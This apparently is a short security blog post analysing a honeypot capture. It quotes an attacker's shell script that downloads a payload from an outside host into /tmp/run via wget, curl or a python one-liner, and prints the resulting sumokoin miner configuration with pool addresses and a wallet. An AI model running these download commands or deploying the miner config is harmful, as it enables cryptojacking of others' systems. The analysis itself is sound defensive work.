Another honeypot-entry catched my eye. First, the attack
itself was unusual because the malware download was executed
by a small python script instead of just running wget or curl:
uname -a
rm -f /tmp/run
if [ ` getconf LONG_BIT ` -eq 64 ]
then u=”http://www.bizqsoft.com/tp2/r6.log”
else u=”http://www.bizqsoft.com/tp2/r.log”
fi
wget -O /tmp/run
curl -o /tmp/run
python -c “import urllib;urllib.urlretrieve(‘$u’,’/tmp/run’)”
Looking into the downloaded binary one finds this miner for
the cryptocoin “sumokoin” using the “cryptonight” algorithm:
{“algo”:”cryptonight”,”av”:0,”background”:false,”colors”:true,”cpu-affinity”:nul
l,”cpu-priority”:null,”donate-level”:5,”log-file”:null,”max-cpu-usage”:75,”print
-time”:60,”retries”:5,”retry-pause”:5,”safe”:false,”syslog”:false,”threads”:null
,”pools”:[{“url”:”pool.sumokoin.hashvault.pro:80″,”user”:”Sumoo6Au3wBiUakx2yC748
Zecr8qKa1J1eMpMCgBQCup9wPecdW7KZiTVvKXGMqvxEDJrYr8pUpDkhG5MHUjf7XX64WoxR4kxon”,”
pass”:”x86_64″,”keepalive”:true,”nicehash”:false},{“url”:”pool.sumokoin.com:3333
“,”user”:”Sumoo6Au3wBiUakx2yC748Zecr8qKa1J1eMpMCgBQCup9wPecdW7KZiTVvKXGMqvxEDJrY
r8pUpDkhG5MHUjf7XX64WoxR4kxon”,”pass”:”x86_64″,”keepalive”:true,”nicehash”:false
},],”api”:{“port”:0,”access-token”:null,”worker-id”:null}}
(see https://coinmarketcap.com/currencies/sumokoin/ )
Looking into the blockchainexplorer I currently find no transactions linked
to that address, but that may be because of the nature of sumokoin ..